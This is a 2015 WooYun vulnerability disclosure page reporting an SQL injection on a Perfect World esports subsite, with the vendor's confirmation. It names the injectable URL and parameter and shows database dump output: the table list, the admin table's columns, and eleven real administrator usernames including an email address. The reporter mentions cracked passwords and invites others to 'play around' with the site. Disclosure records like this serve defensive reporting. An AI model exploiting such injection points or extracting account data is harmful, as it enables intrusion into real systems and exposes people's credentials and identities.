当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136957

漏洞标题:完美电竞平台某分站SQL注射漏洞一只

相关厂商:完美世界

漏洞作者: 冷白开。

提交时间:2015-08-26 13:19

修复时间:2015-10-11 11:30

公开时间:2015-10-11 11:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-27: 厂商已经确认,细节仅向厂商公开
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

完美电竞平台SQL注射漏洞一只

详细说明:

注射点

http://games.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId=879

1.png

脱出来一点数据证明问题存在

available databases [2]:
[*] information_schema
[*] wmp_main
Database: wmp_main
[101 tables]
+---------------------------------+
| tb_bid_dota2                    |
| tb_bid_dota2_copy               |
| tb_bid_dota2_copy1              |
| tb_bug_feedback                 |
| tb_clients_info                 |
| tb_common_sequence              |
| tb_cup_dota2                    |
| tb_cup_match_log_dota2          |
| tb_cup_request_dota2            |
| tb_cup_round_dota2              |
| tb_cup_schedule_dota2           |
| tb_cup_schedule_ob_data2        |
| tb_cup_team_dota2               |
| tb_deploy_area                  |
| tb_deploy_host                  |
| tb_deploy_host_ip               |
| tb_deploy_line                  |
| tb_deploy_service               |
| tb_deploy_service_type          |
| tb_dota2_daomoney_log           |
| tb_dota2_hero_item              |
| tb_dota2_trade_data             |
| tb_dota2_trade_item             |
| tb_dota2_trade_knapsack         |
| tb_dota2_trade_log              |
| tb_event_game_match_dota2       |
| tb_game_illegal_app_records     |
| tb_game_map                     |
| tb_game_play_detail_dota        |
| tb_game_play_detail_dota2       |
| tb_game_play_detail_dota2_pub   |
| tb_game_play_detail_war3_1v1    |
| tb_game_play_detail_war3_2v2    |
| tb_game_play_dota               |
| tb_game_play_dota2              |
| tb_game_play_dota2_pub          |
| tb_game_play_war3_1v1           |
| tb_game_play_war3_2v2           |
| tb_game_room                    |
| tb_game_type                    |
| tb_global_dota2_code            |
| tb_guild                        |
| tb_guild_member                 |
| tb_guild_score_change_dota      |
| tb_guild_score_dota             |
| tb_log_dota2_honor_record       |
| tb_log_game_dota2               |
| tb_log_login                    |
| tb_log_match_stats              |
| tb_log_match_stats_dota2        |
| tb_log_online                   |
| tb_log_record                   |
| tb_prop_activity_dota2          |
| tb_prop_item_dota2              |
| tb_resource_dota_equip          |
| tb_resource_dota_hero           |
| tb_resource_dota_item           |
| tb_school                       |
| tb_school_member                |
| tb_school_score_change_dota     |
| tb_school_score_dota            |
| tb_setting_city                 |
| tb_setting_country              |
| tb_setting_dota2_bid_item       |
| tb_setting_dota2_bid_item_copy  |
| tb_setting_dota2_hero           |
| tb_setting_dota2_honor_exchange |
| tb_setting_dota2_item           |
| tb_setting_global               |
| tb_setting_province             |
| tb_setting_public_notice        |
| tb_setting_shieldword           |
| tb_system_notice                |
| tb_team                         |
| tb_team_join_request            |
| tb_team_member                  |
| tb_team_score_change_dota       |
| tb_team_score_change_dota2      |
| tb_team_score_dota              |
| tb_team_score_dota2             |
| tb_user_account                 |
| tb_user_chip_dota2              |
| tb_user_code_dota2              |
| tb_user_favorite                |
| tb_user_friend                  |
| tb_user_friend_group            |
| tb_user_friend_group_member     |
| tb_user_hero                    |
| tb_user_hero_info_dota          |
| tb_user_offline_message         |
| tb_user_passport                |
| tb_user_prop_dota2              |
| tb_user_score_dota              |
| tb_user_score_dota2             |
| tb_user_score_war3_1v1          |
| tb_user_score_war3_2v2          |
| tb_user_third_auth              |
| tb_user_visit                   |
| tb_web_downloads                |
| tb_web_records                  |
| tb_web_user_manage              |
+---------------------------------+
Database: wmp_main
Table: tb_web_user_manage
[9 columns]
+--------------------+------------------+
| Column             | Type             |
+--------------------+------------------+
| f_create_time      | datetime         |
| f_last_modify_time | timestamp        |
| f_nick_name        | varchar(100)     |
| f_parent_user_id   | int(11)          |
| f_status           | smallint(6)      |
| f_user_id          | int(11) unsigned |
| f_user_level       | varchar(50)      |
| f_user_name        | varchar(100)     |
| f_user_password    | varchar(100)     |
+--------------------+------------------+
Database: wmp_main
Table: tb_web_user_manage
[11 entries]
+------------------+
| f_user_name      |
+------------------+
| dengxiaohui      |
| fishnet_adm1     |
| jancy            |
| jinanyi@wywk.cn  |
| netfish_mg1      |
| panqianliang     |
| pwel             |
| rentian          |
| roc              |
| test_dengxiaohui |
| yelei            |
+------------------+

跑出来如下密码

2.png

随意玩耍喽,喝了点酒,头晕,不深入了,你们玩

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-27 11:28

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补。

最新状态:

暂无